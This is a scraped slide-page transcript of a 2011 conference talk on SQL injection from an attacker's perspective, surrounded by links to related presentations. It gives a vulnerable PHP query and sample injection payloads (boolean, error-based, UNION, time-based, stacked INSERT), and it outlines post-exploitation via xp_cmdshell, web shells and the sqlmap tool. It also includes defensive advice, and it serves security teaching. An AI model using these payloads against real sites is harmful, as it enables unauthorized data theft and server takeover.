Cross Domain Access Policy solution using Cross Origin Resource sharingCross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharingAnkit Garg
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
 

Ähnlich wie It all starts with the ' (SQL injection from attacker's point of view) (20)

Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 
4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Top Security Threats for .NET Developers
Top Security Threats for .NET DevelopersTop Security Threats for .NET Developers
Top Security Threats for .NET Developers
 
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
 
DNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmapDNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmap
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
QA Automation Extended Star
QA Automation Extended StarQA Automation Extended Star
QA Automation Extended Star
 
6.Resource Exhaustion
6.Resource Exhaustion6.Resource Exhaustion
6.Resource Exhaustion
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
HTML5 storage and communication - Zohar Arad
HTML5 storage and communication - Zohar AradHTML5 storage and communication - Zohar Arad
HTML5 storage and communication - Zohar Arad
 
Cross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharingCross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharing
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualization
 

Mehr von Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 

Mehr von Miroslav Stampar (8)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 

Kürzlich hochgeladen

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Kürzlich hochgeladen (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

It all starts with the ' (SQL injection from attacker's point of view)

  • 1. It all starts with the ' (SQL injection from attacker's point of view) Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 2
  • 3. What is SQL injection? (2)  In plain speak, SQL injection is (mostly) about the unauthorized DBMS data access  Just in special cases, it's about the data modification together with system takeover  “Hello World” vulnerable code example (PHP/MySQL):  $sql = "SELECT * FROM table_name WHERE id =  " . $_GET["id"];  $result = mysql_query($sql) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 3
  • 4. Well known cases  In period 2005 till 2007 Albert Gonzalez has stolen 130 million credit card numbers  June 2007 – Microsoft U.K. Website defaced  December 2009 – RockYou (32 million credentials stolen)  December 2009 – NASA  July 2010 – The Pirate Bay FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 4
  • 5. Well known cases (2)  February 2011 – HBGary (Anonymous)  March 2011 – MySQL  March & May 2011 – Comodo (certificate reseller)  June 2011 – Sony, PBS (@LulzSec)  August 2011 – Nokia  September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 5
  • 6. Attackers' motivation number of vulnerable sites collected x  time spent on each site = const. time spent on particular target /  motivation = const. (target = multiple (co)sites) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 6
  • 7. Attackers' profiles 1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target (“script kiddies”) 2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) (“black hats”/“crackers”/”bad guys”) 3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage (”gray hats”/”hackers”/”good guys”) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 7
  • 8. SQL injection techniques  Boolean/Blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union/Inband – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 8
  • 9. SQL injection techniques (2)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked – ;INSERT INTO users VALUES (10,  'test', 'testpass'), affecting mainly Microsoft SQL and PostgreSQL platforms, required for data modification, system access (e.g. xp_cmdshell), UDF injection, there are also time and error-based variants for data retrieval  Other (DNS exfiltration, “Lateral”, Second order attacks, etc.) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 9
  • 10. Attacking phases  Most SQL injection attacks can be dissected into following phases: 1) Searching for a vulnerable parameter (aka. “Injection point”) 2) Fingerprinting backend DBMS (for usage of proper payloads – e.g. error-based) 3) Finding a fastest applicable technique (U>E>B>T=S) 4) Enumeration (retrieving data of interest – e.g. usernames and passwords) 5) Eventual post-exploatation (underlying OS access, data modification, web server takeover) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 10
  • 11. Attacking workflow (1)  Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap ­p 80), SHODAN (specialized Computer Search Engine), “drive-by” (e.g. proxying of all casual everyday traffic), “hit-list”, etc.  Manual web-browser based GET/POST parameter tampering with “poisonous” SQL characters (e.g. appending character ' to the end of the original parameter value) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 11
  • 12. Attacking workflow (2)  In case of a contained DBMS error attacker immediately proceeds with the “proper” (DBMS dependent) error-based payloads   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 12
  • 13. Attacking workflow (3)  Otherwise, following step is the usage of common boolean based payloads (e.g. AND  1=1­­%20, OR 1=1­­%20, etc.)   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 13
  • 14. Attacking workflow (4)  Along the attacking line, proper SQL injection prefix/suffix combination has to be “guessed”  For example, different payloads are needed in cases: ”SELECT * WHERE id='.$_GET[“id”] and ”SELECT * WHERE id=('.$_GET[“id”]')”  Adds one more dimension to the problem (more combinations)  Most common prefixes are: <blank>, ', “, '), “)  Problem of suffix finding can be most often circumvented by the usage of generic comment form: ­­%20 FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 14
  • 15. Attacking workflow (5)  In case that boolean/blind injection worked, there is a great possibility for union/inband  Brute-force search for proper column number  ORDER BY fast column number finding technique  Looking if it's a partial or full inband case  Finding usable (presented) column FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 15
  • 16. Attacking workflow (6)  If everything fails attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries  Most commonly, this happens in INSERT/UPDATE/DELETE SQL injection cases (and DBMS error messages are suppressed)  Common payloads are: AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*)  FROM GENERATE_SERIES(1,5000000), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 16
  • 17. Attacking workflow (7)  Enumeration phase consists of retrieving (”stealing”) data of interest:  Database and table names  Table dumps (e.g. users, admin,...)  System stored usernames and password hashes  User privileges and roles  Highly DBMS dependent (system database and table names, common function names, etc.)  Usage of automated tools is highly preferable in boolean/blind and time-based techniques FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 17
  • 18. Attacking workflow (8)  Eventual post-exploitation is highly bounded by the applicable SQL injection technique(s) and current user privileges  Best/worst case scenario is the availability of stacked technique along with the “admin” privileges  UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell()), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 18
  • 19. Process automation 1) Web Application Assessment Proxy (optional) – BURP, WebScarab 2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja 3) Second order exploitation framework – Metasploit (optional) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 19
  • 20. Introducing sqlmap  “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)”  Unofficially, sqlmap is AIO (All-In-One) SQL injection tool  Over 10,000 repository updates and/or checkouts on a monthly basis  Part of most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing,... FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 20
  • 21. sqlmap capabilities  Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB  Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Timed-based, Stacked  Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 21
  • 22. sqlmap capabilities (2)  Automatic recognition and cracking of password hashes  Support for IDS/WAF evasion in form of “tampering” scripts  Web server file upload/download  Arbitrary OS command execution and retrieval of standard console output  Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 22
  • 23. Closing words (for attackers)  Learn SQL more than "well" – “SQL injection is 100% SQL. The rest is injection”  Setup (virtual) vulnerable environment entirely by yourself – for gaining better mindset and possessing LEGAL assessment testing machine  Mimic with comprehension what other “attackers” do – including automated tools (e.g. sqlmap)  Research defensive mechanisms – for advanced comprehension of the topic FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 23
  • 24. Closing words (for defenders)  Use (only) prepared SQL statements (bullet- proof against SQL injection attacks)  Self-filtering procedures are prone to common “programmer's” mistakes (e.g. forgetting to hard type-cast the integer parameter value)  Turn-off error (DBMS) reports  Use least privileged run (non-admin “query” user)  Always expect worst scenario and setup accordingly (e.g. use GRANT/REVOKE mechanism accordingly) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 24
  • 25. Questions? FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 25